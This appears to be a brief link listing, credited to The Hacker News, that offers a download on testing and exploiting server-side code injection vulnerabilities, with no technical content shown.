    • Testing and exploiting of Server-side Code Injection vulnerabilities


Download Here

Credit:  The Hacker News